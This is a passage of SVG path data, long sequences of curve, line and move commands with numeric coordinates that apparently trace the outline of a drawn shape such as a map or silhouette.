259.20543,89.087949 267.37511,90.660461 C 269.33248,91.037219 270.03184,90.860532 269.56609,90.106933 C 269.11276,89.373426 270.16695,88.989271 272.69098,88.968197 C 274.78594,88.950705 277.37351,88.275705 278.44113,87.468197 C 280.29011,86.069697 280.24264,85.999285 277.44113,85.984944 C 275.82351,85.976663 272.75915,85.363836 270.63145,84.623106 C 266.77001,83.278804 266.76791,83.275067 269.48734,82.592534 C 271.26583,82.146161 273.03082,82.445399 274.57071,83.454371 C 277.26932,85.222571 280.58796,85.475708 281.51008,83.983688 C 281.85554,83.424717 282.6696,83.277069 283.3191,83.655582 C 283.96859,84.034096 283.68424,83.412281 282.68721,82.273772 C 280.91946,80.25518 280.93188,80.201714 283.18721,80.121573 C 284.45924,80.076373 286.85,79.872162 288.5,79.667772 C 290.15,79.463382 291.74494,79.668804 292.0443,80.124266 C 292.60353,80.975085 300,79.337892 300,78.363289 C 300,78.064802 298.9875,76.999689 297.75,75.996372 C 296.5125,74.993055 295.83303,73.837892 296.24007,73.429343 C 297.20334,72.462499 301.72241,77.332766 301.23072,78.807837 C 301.02377,79.428701 299.30722,80.226941 297.41617,80.581704 C 294.12572,81.198997 291.61728,83 294.04797,83 C 294.68927,83 294.95672,83.670413 294.64229,84.489807 C 294.25887,85.488973 294.8823,86.183339 296.5353,86.598215 C 297.89088,86.938445 299,87.618032 299,88.108408 C 299,88.598784 300.09844,89 301.44098,89 C 304.00847,89 306.06159,90.87926 303.80902,91.167506 C 299.92659,91.664313 296.41859,91.386435 295.80728,90.533665 C 295.39363,89.956631 293.41818,90.520749 290.90375,91.93394 C 287.10182,94.070744 286.57916,94.144955 285.52126,92.698186 C 284.78322,91.68886 283.54469,91.306306 282.17479,91.664542 C 280.81677,92.019672 280,91.773715 280,91.009643 C 280,90.336651 280.5625,90.000864 281.25,90.263449 C 282.05426,90.570631 282.53687,89.739035 282.6034,87.931365 L 282.7068,85.121855 L 279.51147,87.559046 C 277.75405,88.899501 275.12005,90.09523 273.65815,90.216221 C 272.19624,90.337211 269.84018,91.432931 268.42245,92.651153 C 267.00471,93.869375 263.85637,95.683729 261.42612,96.683051 C 258.99588,97.682373 257.00581,98.869643 257.00375,99.321429 C 257.00169,99.773214 256.30105,100.8418 255.44678,101.69607 C 253.06392,104.07894 254.00264,107.44243 257.15229,107.80699 C 258.92787,108.01251 260.1743,109.00415 260.9231,110.80699 C 261.94917,113.27742 262.54104,113.51458 268.0841,113.67646 C 272.02983,113.79169 275.05887,114.48357 276.81329,115.67034 C 280.77358,118.34928 286.79522,119.96765 292.86663,119.98482 C 297.82004,119.99883 298.19105,120.16143 297.68503,122.09645 C 296.92932,124.98628 297.87365,127 299.98454,127 C 300.95836,127 302.37271,127.74964 303.12756,128.66587 C 304.36482,130.16767 304.22914,130.26429 301.75,129.64682 C 298.24185,128.77307 298.29371,129.1017 302.10909,131.92254 C 304.80669,133.91695 305.52895,134.05487 307.56614,132.9646 C 309.44832,131.95729 309.71727,131.34022 308.92187,129.85401 C 308.37614,128.8343 308.18202,128 308.4905,128 C 308.79897,128 308.3585,126.66016 307.51167,125.02257 C 305.99856,122.09653 306.01969,122.03369 308.73599,121.38223 C 314.11672,120.09174 317,118.05581 317,115.5469 C 317,113.33485 313.71234,109.76852 310.69982,108.7127 C 309.85878,108.41794 310.0233,107.70167 311.25,106.31736 C 313.23945,104.0723 313.54067,102 311.87756,102 C 311.10205,102 311.1399,101.53636 312,100.5 C 312.99593,99.299981 312.98328,98.684777 311.93675,97.423785 C 309.94746,95.02684 312.58533,93.806404 318,94.618561 C 320.475,94.989791 323.4,95.224546 324.5,95.14024 C 327.5691,94.905017 334.82465,97.083786 336.10344,98.624641 C 336.73124,99.381088 338.58793,100 340.22943,100 C 342.47152,100 343.07079,100.37315 342.63837,101.5 C 341.75341,103.80617 342.96005,105.92798 346.07152,107.53699 C 350.23149,109.68819 351.52894,109.3859 355.44573,105.35291 L 358.98773,101.70583 L 363.89212,106.10291 C 366.58953,108.52131 368.84229,111.0625 368.89825,111.75 C 368.95421,112.4375 369.45,113 370,113 C 370.55,113 371,113.94213 371,115.09362 C 371,116.34624 371.8034,117.39733 373,117.71025 C 374.1,117.99791 375,118.63078 375,119.11663 C 375,119.60248 376.125,120 377.5,120 C 378.875,120 380,120.47656 380,121.05902 C 380,121.64148 380.40939,121.86502 380.90976,121.55577 C 382.30607,120.6928 385,122.04378 385,123.60699 C 385,124.37314 385.8449,125 386.87756,125 C 389.36228,125 390.63727,126.74376 391.26458,131 C 391.65376,133.64054 391.25488,135.1139 389.64022,137 C 388.4631,138.375 387.89667,139.17833 388.38148,138.78518 C 388.8663,138.39203 390.2163,138.58771 391.38148,139.22003 C 392.54667,139.85234 394.56904,140.39901 395.87565,140.43484 C 398.9927,140.52033 402.39344,146.39634 400.91964,149.15016 C 399.87287,151.10605 395,151.75704 395,149.94098 C 395,149.35852 395.51953,149.20305 396.15451,149.59549 C 396.8685,150.03676 397.03762,149.86989 396.59776,149.15818 C 396.07647,148.31472 395.10036,148.41386 392.94325,149.52935 C 390.2367,150.92896 389.56455,150.75786 389.88158,148.75 C 389.99544,148.02887 384.83249,147.59485 380.34551,147.94836 C 379.16054,148.04172 377.93746,147.70782 377.62754,147.20637 C 376.74829,145.7837 379.53075,142.59196 380.90814,143.44323 C 381.81304,144.00249 381.72031,144.48408 380.54173,145.346 C 379.30443,146.25087 380.74872,146.48828 387.23189,146.4457 C 393.80592,146.40252 395.43431,146.10301 395.1794,144.98391 C 395.00307,144.20978 395.65158,142.99672 396.62053,142.28821 C 398.7316,140.74456 398.05296,140.64917 394.51893,141.9928 C 392.55928,142.73786 391.3378,142.61221 389.62401,141.48929 C 388.36799,140.66632 387.03877,140.29456 386.67017,140.66316 C 386.30158,141.03175 386,140.59917 386,139.70185 C 386,138.80453 386.9126,137.58196 388.02801,136.98501 C 389.14341,136.38806 389.77094,135.43839 389.42251,134.87462 C 388.5541,133.46949 384,137.87088 384,140.1153 C 384,141.08696 383.52006,142.17858 382.93347,142.54112 C 380.89888,143.79857 380.90273,142.20834 382.94237,138.86278 C 384.06996,137.01325 384.99421,135.13218 384.99626,134.68261 C 385.00137,133.5657 380.91028,134.94687 379.22671,136.63043 C 377.19412,138.66302 373.54529,139.30332 368.23719,138.55886 L 363.5,137.89447 L 366.86278,140.00112 C 368.71231,141.15978 369.97079,142.36254 369.65941,142.67393 C 368.78162,143.55171 362,142.0295 362,140.95469 C 362,140.42961 361.2125,139.95514 360.25,139.90032 C 359.08333,139.83387 359.33333,139.53376 361,139 C 363.13604,138.31592 362.91767,138.19936 359.5,138.19936 C 354.35945,138.19936 350.76059,139.21822 350.22494,140.82519 C 349.90088,141.79736 350.99345,141.9371 354.88362,141.42105 C 359.16316,140.85335 360.07032,141.01968 360.62854,142.47437 C 361.02009,143.49475 360.72013,144.55493 359.89572,145.06445 C 359.12807,145.53888 358.5,146.27235 358.5,146.69437 C 358.5,147.73809 355.77897,147.7286 354.2938,146.6797 C 353.6304,146.21117 352.54837,146.16109 351.8893,146.56842 C 351.13122,147.03693 350.95312,146.88487 351.40451,146.15451 C 351.79695,145.51953 353.63992,145 355.5,145 C 359.15725,145 361.09347,143.35683 358.575,142.39041 C 356.84731,141.72743 347.6054,143.66721 344.5,145.3446 C 343.4,145.93877 342.05,146.29716 341.5,146.14102 C 340.95,145.98489 341.03927,146.40605 341.69838,147.07695 C 342.35748,147.74784 344.15347,148.34248 345.68945,148.39838 C 347.97972,148.48172 348.57487,149.03973 348.99751,151.5 C 349.55164,154.72574 352.01005,155.71626 356.60171,154.56383 C 359.26369,153.89572 359.83178,151.25642 357.50574,150.36383 C 356.6839,150.04846 356.27396,149.36573 356.59477,148.84666 C 356.94594,148.27846 357.72212,148.35442 358.54522,149.03753 C 359.29716,149.66159 360.35101,149.9011 360.8871,149.56978 C 361.42319,149.23846 362.14446,149.42472 362.48992,149.98369 C 362.83538,150.54266 364.44148,151 366.05902,151 C 367.67656,151 368.94671,151.3375 368.88158,151.75 C 368.52312,154.02023 369.22527,153.98333 371.07258,151.63486 C 373.38399,148.69638 375,148.22942 375,150.5 C 375,151.325 375.45,152 376,152 C 376.55,152 377,152.34015 377,152.75589 C 377,153.6508 373.57322,155.22849 365.91183,157.86087 C 362.83834,158.9169 359.41045,160.35123 358.2943,161.04828 C 357.17815,161.74533 355.53032,162.03375 354.63247,161.68921 C 352.17636,160.74671 352.6705,158.07577 355.5,157 C 356.875,156.47723 358,155.85549 358,155.61837 C 358,154.88992 353.61945,156.25182 351.43134,157.66055 C 350.29357,158.39306 348.15607,159.09225 346.68134,159.2143 C 345.2066,159.33635 344,159.68941 344,159.99887 C 344,160.30833 342.7516,161.03274 341.22577,161.60868 C 338.35652,162.6917 337.138,166.34922 339.21814,167.63482 C 339.87131,168.0385 340.02272,167.84577 339.59549,167.15451 C 339.20305,166.51953 339.35852,166 339.94098,166 C 340.52344,166 341,166.62391 341,167.38646 C 341,168.26302 339.34506,169.02109 336.5,169.44773 C 334.025,169.81888 332,170.54497 332,171.06127 C 332,171.57757 331.09035,172 329.97856,172 C 328.79278,172 327.48623,173.03349 326.81805,174.5 C 326.19155,175.875 325.34565,177 324.93826,177 C 324.53087,177 323.21896,178.65859 322.0229,180.68576 C 320.29566,183.61321 320.06184,184.84031 320.88641,186.65005 C 321.96545,189.01827 320.88484,190.66489 319.01145,189.50708 C 318.44283,189.15565 318.278,189.56088 318.62343,190.46105 C 319.04989,191.5724 318.32198,192.3404 316.11197,193.11081 C 314.40039,193.70747 313,194.60163 313,195.09783 C 313,195.59402 312.35389,196 311.56421,196 C 310.77452,196 308.03732,197.90306 305.48154,200.22903 C 300.23529,205.00354 300.10016,206.24327 303.78977,215.74958 C 306.03684,221.53914 305.56214,226.26764 302.67808,226.82332 C 301.75514,227.00115 301,226.65976 301,226.06467 C 301,225.46958 299.7625,223.59391 298.25,221.89653 C 296.7375,220.19915 295.47609,217.84054 295.44687,216.65519 C 295.41765,215.46983 294.81366,213.43955 294.10466,212.14344 C 293.04165,210.20016 292.28052,209.8939 289.76463,210.39707 C 287.9273,210.76454 286.11229,210.50859 285.20185,209.75363 C 284.37034,209.06413 281.26431,208.5 278.29956,208.5 C 273.28663,208.5 272.9468,208.65026 273.44739,210.64554 C 273.93512,212.58961 273.6342,212.76187 270.24283,212.48003 C 268.18428,212.30894 264.6914,211.65259 262.48089,211.02145 C 258.16671,209.78969 256.98535,210.08775 249.5,214.2966 C 245.88084,216.33158 245.5,216.92438 245.5,220.52286 C 245.5,222.71029 245.12346,225.08269 244.66325,225.79487 C 243.57975,227.4716 243.50347,234.65951 244.52842,238.5 C 245.6555,242.72316 248.95065,246.88459 252.48626,248.54989 C 255.09242,249.77742 256.23183,249.77509 260.91135,248.53265 C 266.38865,247.07839 267.95692,245.82343 267.98469,242.87244 C 268.00904,240.28451 270.34097,239.01175 275.91701,238.543 C 282.46747,237.99235 283.07616,239.22162 279.74098,246.26563 C 278.37587,249.14878 276.93619,253.41824 276.54168,255.75331 C 276.14717,258.08838 275.17064,260.36475 274.37162,260.81191 C 272.55299,261.82966 273.6178,265 275.77825,265 C 276.6386,265 278.16545,265.74474 279.17126,266.65499 C 280.17707,267.56523 281,267.83425 281,267.25281 C 281,266.67137 282.35,265.72504 284,265.14984 C 285.65,264.57465 287,263.6109 287,263.00818 C 287,262.40546 287.5625,261.98537 288.25,262.07465 C 291.67419,262.5193 292.38806,261.96011 290.28066,260.48403 C 288.8484,259.48084 286.63182,259.11342 283.72767,259.39781 C 281.31393,259.63418 278.80022,259.49456 278.14165,259.08755 C 277.48309,258.68053 279.94747,258.30198 283.61805,258.24631 C 292.77679,258.10743 296.50508,260.73929 293.89359,265.5 C 292.71682,267.64525 293.08398,276.47923 294.43566,278.54215 C 295.21084,279.72522 297.22728,281.26571 298.91664,281.96547 C 301.52235,283.04479 302.35973,282.99432 304.43791,281.63264 C 307.4278,279.67359 312.64196,280.45383 314.29973,283.10834 C 315.39069,284.85524 315.53982,284.84149 317.72021,282.79312 C 318.97409,281.61516 320,279.90067 320,278.98316 C 320,278.03823 321.62588,276.54399 323.75,275.53678 C 325.8125,274.55879 329.2361,272.87152 331.35799,271.7873 C 334.27844,270.29503 335.4935,270.09766 336.35799,270.97508 C 337.21736,271.84732 336.81248,272.63825 334.722,274.17089 C 331.82326,276.29613 328.27938,282 329.85769,282 C 330.35767,282 331.09619,283.0125 331.49885,284.25 C 331.90151,285.4875 332.34774,286.8375 332.49048,287.25 C 332.63322,287.6625 332.80625,288.39097 332.875,288.86883 C 332.94375,289.34668 334.35787,289.57955 336.01749,289.38632 C 337.93766,289.16275 339.672,289.672 340.78668,290.78668 C 341.98689,291.98689 343.74975,292.44541 346.38618,292.24309 C 349.73441,291.98615 350.13916,292.17842 349.50355,293.72391 C 347.93133,297.54674 347.81052,299.06676 348.96807,300.46152 C 349.63033,301.2595 349.91971,302.3209 349.61113,302.82019 C 349.07186,303.69274 352.58151,312 353.48941,312 C 353.73292,312 355.51139,311.24691 357.44157,310.32647 C 360.11296,309.05258 360.85243,308.15709 360.53825,306.57647 C 360.31123,305.43441 359.88046,303.32934 359.58098,301.89854 C 359.04714,299.34813 359.1293,299.30458 363.76823,299.67883 C 369.57129,300.14699 372.73305,298.23823 371.12661,295.23656 C 370.37015,293.82312 370.47298,292.76974 371.51225,291.28597 C 372.29168,290.17318 372.65587,288.9892 372.32157,288.6549 C 371.98726,288.3206 372.45315,287.76334 373.35687,287.41655 C 375.41262,286.62768 375.50903,285 373.5,285 C 372.675,285 371.98839,284.2125 371.9742,283.25 C 371.95857,282.18961 370.33942,280.75744 367.86534,279.61563 C 364.48338,278.05483 363.1737,277.91804 360.2382,278.81897 C 357.93927,279.52453 356.0683,279.57174 354.91281,278.95334 C 353.93308,278.429 351.85191,278 350.28798,278 C 348.67365,278 346.69768,277.1278 345.71687,275.9823 C 344.44467,274.49648 343.26575,274.12308 341.24463,274.56582 C 335.95753,275.72399 335.80997,275.85831 336.47891,278.90397 C 337.14535,281.93827 335.58868,283.98868 333.90037,282.30037 C 332.16169,280.56169 334.03552,275.2079 336.60878,274.56205 C 337.92395,274.23197 339,273.29547 339,272.48095 C 339,271.66643 339.45,271 340,271 C 340.55,271 341,271.45 341,272 C 341,272.55 341.66088,273 342.46862,273 C 343.27635,273 343.80011,272.4375 343.63251,271.75 C 343.46491,271.0625 343.55404,270.95 343.83056,271.5 C 344.10709,272.05 344.25833,272.6125 344.16667,272.75 C 344.075,272.8875 344.9,273.9 346,275 C 347.19192,276.19192 349.33333,277 351.3,277 C 353.115,277 355.06475,277.46475 355.63278,278.03278 C 356.95704,279.35704 360,278.21449 360,276.39301 C 360,275.62686 360.675,275 361.5,275 C 362.325,275 363,275.38394 363,275.85321 C 363,276.32247 365.26972,276.48832 368.04381,276.22177 C 371.98697,275.84288 373.02351,276.03858 372.79381,277.11856 C 372.63222,277.87835 372.05,278.83061 371.5,279.23469 C 370.88069,279.68968 370.97587,279.9752 371.75,279.98469 C 372.4375,279.99311 373,280.9 373,282 C 373,283.30232 373.66667,284 374.91111,284 C 375.96221,284 377.87471,285.24765 379.16111,286.77255 C 383.13584,291.48425 386.10279,293 391.35078,293 C 398.26534,293 406.56719,297.75293 407.56172,302.281 C 407.95035,304.05042 409.1688,306.27911 410.2694,307.23365 C 411.82872,308.58604 412.016,309.2758 411.11775,310.35812 C 410.20811,311.45416 410.4885,312.09006 412.44733,313.37353 C 413.8126,314.26809 415.42202,315 416.02383,315 C 416.62564,315 416.86586,315.40803 416.55764,315.90674 C 416.24942,316.40545 416.86813,316.58574 417.93256,316.30739 C 420.46302,315.64566 426.18339,317.56982 429.54368,320.21302 C 431.01143,321.36755 433.40205,322.44069 434.85616,322.59776 C 443.94147,323.57918 448.11766,324.91603 452.77256,328.33304 C 455.52003,330.34987 458.66557,332 459.76266,332 C 461.62506,332 462.46061,333.31728 464.39566,339.30416 C 465.05464,341.34298 460.78211,350.46076 458.58997,351.6938 C 457.80165,352.13721 455.61368,354.525 453.7278,357 C 450.74001,360.92115 450.23191,362.44181 449.77787,368.8216 C 449.49128,372.84848 448.74902,376.65098 448.1284,377.2716 C 447.50778,377.89222 446.98999,379.5475 446.97776,380.95 C 446.96553,382.3525 446.07554,384.625 445,386 C 443.92446,387.375 443.03447,389.25718 443.02224,390.18261 C 443.01001,391.10805 442.10914,392.14797 441.02031,392.49355 C 439.93149,392.83913 439.14399,393.62551 439.27031,394.24105 C 439.4005,394.87542 437.98387,395.42749 436,395.51551 C 426.49045,395.93742 415.70812,402.63488 416.10347,407.87425 C 416.47822,412.84063 416.00009,415 414.52568,415 C 413.7148,415 412.31217,416.4625 411.40871,418.25 C 409.18594,422.64776 405.93105,426.07542 404.70013,425.31467 C 404.1451,424.97164 403.97567,425.15162 404.32362,425.71461 C 404.67157,426.27761 403.48103,428.25964 401.67798,430.11912 C 399.87493,431.9786 398.0989,434.2875 397.73124,435.25 C 397.36358,436.2125 396.26115,437.04768 395.28138,437.10596 C 392.2859,437.28414 387.60794,436.91252 385.5,436.32893 C 383.93882,435.8967 383.75712,436.04602 384.67186,437.00946 C 385.31638,437.6883 385.60573,438.86388 385.31487,439.62186 C 385.00077,440.44038 385.43857,441 386.39301,441 C 388.41691,441 388.47994,443.35679 386.5,445 C 385.675,445.68469 385,446.81991 385,447.5227 C 385,448.67772 381.74362,449.70323 372.31515,451.51746 C 369.81809,451.99795 368.99104,452.7643 368.48548,455.06609 C 367.77543,458.29895 364.74157,459.65392 360.56188,458.60489 C 358.54251,458.09806 358.15039,458.34633 358.27875,460.05046 C 358.39844,461.63932 358.93002,461.9834 360.61261,461.56109 C 364.4587,460.59579 364.4204,463.83188 360.56397,465.67088 C 358.241,466.77863 357.27932,467.85408 357.51542,469.08007 C 357.90969,471.12735 356.58656,472.42614 353,473.51239 C 351.625,473.92884 350.18824,474.75632 349.8072,475.35124 C 348.77721,476.95939 350.91094,479 353.62244,479 C 355.24528,479 356,479.57139 356,480.8 C 356,483.09708 354.10572,485 351.81905,485 C 350.77846,485 349.79035,485.98711 349.44213,487.37453 C 349.11435,488.68052 347.75578,490.24588 346.42308,490.85309 C 343.69392,492.09658 343.29438,494.1695 345.44056,495.95067 C 346.23287,496.60823 346.6962,497.67583 346.47019,498.32311 C 345.31373,501.63521 353.21376,505.98065 360.41667,505.99442 C 364.7857,506.00278 363.19243,506.68434 357.11952,507.40487 C 354.16026,507.75598 351.3515,508.28276 350.87783,508.5755 C 349.00343,509.73395 342.26391,509.50308 338,508.13436 z M 351.25,505.41556 C 349.4625,504.63385 348,503.54555 348,502.99713 C 348,502.44871 347.55,502 347,502 C 346.45,502 346,502.87011 346,503.93358 C 346,505.27528 346.84179,505.99468 348.75,506.28375 C 353.87649,507.06034 354.50887,506.84073 351.25,505.41556 z M 345,502.05902 C 345,500.44148 344.48047,498.79695 343.84549,498.40451 C 343.13432,497.96498 342.96226,498.12992 343.39743,498.83404 C 343.85455,499.57367 343.55615,499.76691 342.55194,499.38156 C 341.69837,499.05401 341,499.28417 341,499.89301 C 341,500.50186 341.45,501 342,501 C 342.55,501 343,501.48032 343,502.06739 C 343,502.68812 342.05847,502.87989 340.75,502.52567 C 338.67198,501.96313 338.69109,502.03171 341,503.42285 C 344.52541,505.54695 345,505.38514 345,502.05902 z M 337,502.10699 C 337,501.61583 336.34792,500.96375 335.55093,500.65792 C 334.58241,500.28626 334.28626,500.58241 334.65792,501.55093 C 335.26488,503.13266 337,503.54461 337,502.10699 z M 343.66667,497.66738 C 344.85833,497.57532 345.61284,497.27951 345.34335,497.01001 C 344.58461,496.25128 332.0064,496.41198 332.003,497.18045 C 331.99855,498.18996 336.13857,498.85996 339,498.3128 C 340.375,498.04988 342.475,497.75944 343.66667,497.66738 z M 341.5,495.23469 C 342.05,494.83061 342.64625,493.825 342.825,493 C 343.00375,492.175 343.54097,491.35843 344.01882,491.18539 C 344.49668,491.01236 344.60367,490.11236 344.25659,489.18539 C 343.71517,487.73939 343.85635,487.6876 345.2505,488.82076 C 346.6585,489.96519 347.08746,489.73154 348.46341,487.07076 C 349.37137,485.31495 350.84685,484 351.90905,484 C 352.93078,484 354.00209,483.1 354.28975,482 C 354.66574,480.56221 354.32043,480 353.06137,480 C 350.7818,480 347.5963,476.46222 348.52412,474.96098 C 348.92014,474.3202 350.76422,473.16081 352.62208,472.38455 C 354.47993,471.60828 356.05625,470.5292 356.125,469.98658 C 356.19375,469.44396 356.30625,468.56937 356.375,468.04305 C 356.44375,467.51672 357.32813,466.48055 358.3403,465.74043 C 360.01115,464.51868 360.03417,464.27325 358.5903,463.07494 C 357.71563,462.34903 357,460.72485 357,459.46565 C 357,457.37962 357.42021,457.19058 361.72928,457.3381 C 364.86732,457.44552 366.5076,457.07942 366.60428,456.25 C 366.68443,455.5625 366.85807,454.6625 366.99015,454.25 C 367.12224,453.8375 367.1502,452.7125 367.0523,451.75 C 366.95439,450.7875 367.37913,450 367.99616,450 C 368.61319,450 368.88094,450.38362 368.59117,450.85249 C 368.10859,451.63332 369.9724,451.30398 380,448.83653 C 381.925,448.36286 384.33161,446.82523 385.34803,445.41958 C 387.10368,442.99161 387.10854,442.79985 385.44526,441.58363 C 384.48231,440.87951 384.01357,439.78706 384.40361,439.15596 C 384.8281,438.46913 384.0474,437.52309 382.45881,436.79928 C 380.09626,435.72283 379.87511,435.20079 380.44482,432.04502 C 380.79681,430.09526 381.29854,426.925 381.55977,425 C 381.90815,422.43286 383.4294,420.14223 387.26737,416.40574 C 390.14532,413.60389 393.5125,410.77556 394.75,410.12055 C 395.9875,409.46555 397,408.04547 397,406.96482 C 397,404.40099 395.31503,404.43205 394.49652,407.01097 C 393.58621,409.8791 389.16556,411.75489 384.5,411.25273 C 382.3,411.01594 380.36114,410.68585 380.19142,410.51919 C 380.0217,410.35253 380.52442,408.68064 381.30858,406.80388 L 382.73433,403.3916 L 378.91905,401.1958 C 376.82064,399.98811 374.4136,399 373.57007,399 C 372.72654,399 370.41456,397.425 368.43234,395.5 C 364.49703,391.6783 362.2825,391.10024 361.30779,393.6403 C 360.72551,395.15768 360.58773,395.15667 359.46903,393.62676 C 358.72358,392.6073 357.34684,392.1414 355.87985,392.41215 C 354.57093,392.65373 353.13909,392.88482 352.69798,392.92569 C 352.25687,392.96656 351.43176,394.33161 350.8644,395.95914 C 350.29704,397.58667 348.98693,399.18676 347.95305,399.5149 C 346.38947,400.01116 346.12302,400.94321 346.36902,405.05576 C 346.53169,407.77509 346.3344,410 345.93059,410 C 345.52679,410 344.21844,411.4625 343.02315,413.25 C 340.71642,416.69959 340.69177,416.24047 342.9426,411.75 C 343.70074,410.2375 344.58954,409 344.91772,409 C 345.2459,409 345.35951,407.05241 345.17019,404.67202 C 344.87226,400.92597 345.17382,400.11613 347.41299,398.64897 C 350.15795,396.8504 350.83326,395 348.74469,395 C 347.44442,395 345.0389,389.37102 344.47123,385 C 343.9014,380.61236 342.80278,378 341.52741,378 C 340.67013,378 340.29882,379.92666 340.3229,384.25 C 340.34204,387.6875 340.02348,393.2 339.61498,396.5 C 339.20647,399.8 338.64288,404.50396 338.36254,406.95323 C 338.0822,409.40251 337.41668,412.22142 336.88361,413.21748 C 336.35054,414.21354 335.75859,418.73458 335.56817,423.26425 C 335.2415,431.03519 333.80415,437.31502 331.86352,439.45 C 331.38858,439.9725 331,441.06207 331,441.87126 C 331,442.68045 330.33207,444.08057 329.51571,444.98264 C 328.4228,446.19029 328.25921,447.41703 328.89531,449.63496 C 329.49243,451.717 329.34412,453.39644 328.41503,455.07358 C 326.33321,458.83159 326.66455,460.11334 329.61569,459.71813 C 332.66883,459.30926 335.04532,454.26892 335.56826,447.09319 C 335.74489,444.66945 336.29723,442.41945 336.79568,442.09319 C 338.85948,440.74234 339.76236,433.01121 338.55834,427 C 338.05412,424.4826 338.30009,422.93851 339.43448,421.5 C 340.95023,419.5779 340.97524,419.6024 340.07656,422.12906 C 339.00705,425.13603 339.13792,426.66911 340.70699,429.51403 C 341.55109,431.04449 341.47161,432.35138 340.37599,434.95709 C 339.583,436.84306 339.14725,438.94135 339.40766,439.61995 C 339.66806,440.29855 339.20512,441.4148 338.3789,442.1005 C 337.5312,442.80404 336.96502,444.68761 337.07942,446.42362 C 337.19093,448.11563 336.70672,450.85 336.0034,452.5 C 335.30008,454.15 334.61863,457.13818 334.48908,459.14039 C 334.35952,461.14261 333.94492,463.28011 333.56774,463.89039 C 333.19057,464.50068 333.41098,465 334.05756,465 C 334.7723,465 335.04581,465.98004 334.75525,467.5 C 334.42692,469.21756 334.72188,470 335.69769,470 C 336.55088,470 336.82072,470.48107 336.37344,471.20477 C 335.96392,471.8674 335.48153,473.75529 335.30146,475.40009 C 335.1214,477.04488 334.2862,479.44045 333.44548,480.72356 C 332.60475,482.00667 332.15211,483.43711 332.43962,483.90231 C 332.72713,484.3675 331.90439,485.54262 330.61131,486.51368 C 327.88401,488.5618 328.20069,492 331.11663,492 C 332.33333,492 333,492.70795 333,494 C 333,495.64717 333.66156,495.9973 336.75,495.98469 C 338.8125,495.97627 340.95,495.63877 341.5,495.23469 z M 331,494 C 330.175,493.46684 329.05,493.03063 328.5,493.03063 C 327.95,493.03063 328.175,493.46684 329,494 C 329.825,494.53316 330.95,494.96937 331.5,494.96937 C 332.05,494.96937 331.825,494.53316 331,494 z M 331.38541,482.42785 C 332.42239,480.26753 333.4716,477.0375 333.71699,475.25 C 334.10622,472.41475 333.87625,472 331.91491,472 C 330.67838,472 329.95337,472.2867 330.30379,472.63712 C 330.65421,472.98754 330.05421,474.51951 328.97045,476.04149 C 326.61146,479.35439 326.48449,480.86495 328.5,481.63837 C 330.44121,482.38328 330.44121,484 328.5,484 C 327.675,484 327,484.7125 327,485.58333 C 327,488.28112 329.40718,486.54905 331.38541,482.42785 z M 332.60875,466.18018 C 331.13042,464.70185 331,464.70377 331,466.20393 C 331,467.1018 331.29205,468.59749 331.64899,469.52767 C 332.25618,471.10997 332.35981,471.10844 333.25774,469.50392 C 333.94669,468.27284 333.76357,467.335 332.60875,466.18018 z M 327,464.94098 C 327,464.35852 326.55,464.16008 326,464.5 C 324.71862,465.29194 324.71862,466 326,466 C 326.55,466 327,465.52344 327,464.94098 z M 397.66572,432.73751 C 398.59578,429.7071 398.44597,429.11146 396.26509,427.16891 C 394.92194,425.97253 392.77039,424.72949 391.48386,424.40659 C 390.19733,424.08369 388.90128,423.18512 388.60374,422.40975 C 387.93474,420.66636 383.41086,420.53445 383.12518,422.25 C 383.01069,422.9375 382.75362,426.2 382.55391,429.5 L 382.19079,435.5 L 389.40753,435.81544 L 396.62427,436.13089 L 397.66572,432.73751 z M 401.63529,428.31697 C 402.71145,424.02921 406.2883,419.42794 408.25,419.80779 C 409.2125,419.99416 410,419.69818 410,419.15005 C 410,418.60192 411.12368,416.81803 412.49708,415.18584 C 414.39108,412.93495 414.95415,411.1972 414.8285,407.99058 C 414.69505,404.58482 415.13304,403.40187 417.08142,401.90577 C 420.65396,399.16252 430.23557,394.59263 432.25,394.67121 C 433.2125,394.70875 434,394.32153 434,393.81072 C 434,393.2999 434.49291,393.1866 435.09535,393.55893 C 438.03687,395.37689 446,385.63496 446,380.21841 C 446,379.21828 446.53579,377.86421 447.19065,377.20935 C 447.84551,376.55449 448.51619,372.52699 448.68105,368.25935 C 449.00519,359.86836 449.50746,357.57756 450.84222,358.40249 C 451.31321,358.69358 452.31578,357.77847 453.07015,356.36892 C 453.82452,354.95936 455.72687,352.72472 457.29759,351.40305 C 458.86831,350.08137 459.86178,349 459.5053,349 C 459.14881,349 459.56361,348.29353 460.42707,347.43007 C 462.66935,345.18779 463.42622,341.27133 462.39285,337.25802 C 461.66935,334.44816 460.77515,333.54351 457.67841,332.48846 C 455.57654,331.77236 453.32654,330.55052 452.67841,329.77326 C 450.27185,326.88722 445.94519,325 441.73518,325 C 439.35083,325 436.88865,324.48865 436.26366,323.86366 C 435.41521,323.01521 434.2439,323.24856 431.6403,324.78472 L 428.15327,326.84212 L 428.43304,324.21804 C 428.65579,322.12885 428.0294,321.22768 425.36003,319.79698 C 422.01533,318.00433 416.77598,317.32795 417.25,318.75 C 417.3875,319.1625 417.05,319.69286 416.5,319.92857 C 415.95,320.16429 414.94542,320.91173 414.26759,321.58955 C 413.06287,322.79428 409,322.4187 409,321.10261 C 409,320.73733 410.39488,319.91197 412.09974,319.26845 C 413.8046,318.62494 415.0164,317.54919 414.79263,316.87789 C 414.23345,315.20034 409.9317,315.01442 409.30758,316.64084 C 409.02893,317.36699 407.77092,317.87588 406.51201,317.77168 C 405.10414,317.65517 404.41294,317.08747 404.71632,316.29687 C 404.98761,315.58991 405.61242,315.26046 406.10478,315.56476 C 406.59715,315.86906 407,315.56441 407,314.88776 C 407,314.21111 407.78153,312.7939 408.73672,311.73842 C 410.26051,310.05466 410.29116,309.67717 408.98672,308.65968 C 408.16903,308.02186 407.35922,306.67525 407.18715,305.66722 C 407.01509,304.65919 406.53049,302.90502 406.11028,301.76907 C 405.40354,299.85857 405.18249,299.96866 403.16234,303.23733 C 400.85246,306.97479 396.87613,308.53926 393.83009,306.90907 C 392.6704,306.28842 391.66569,306.47717 390.6332,307.50965 C 389.62329,308.51957 388.90892,308.66164 388.46362,307.94114 C 388.09848,307.35033 388.10729,306.55938 388.4832,306.18347 C 389.19784,305.46883 389.77158,305.33112 392.89301,305.125 C 395.29621,304.96631 396.2999,302.42889 394.95414,299.91431 C 394.22392,298.54987 394.2474,297.45773 395.03323,296.23675 C 396.07273,294.62163 396.11096,294.62763 395.57909,296.32244 C 395.26454,297.32479 395.47139,299.01229 396.03877,300.07244 C 396.75931,301.41879 396.7338,302.62888 395.95416,304.08565 C 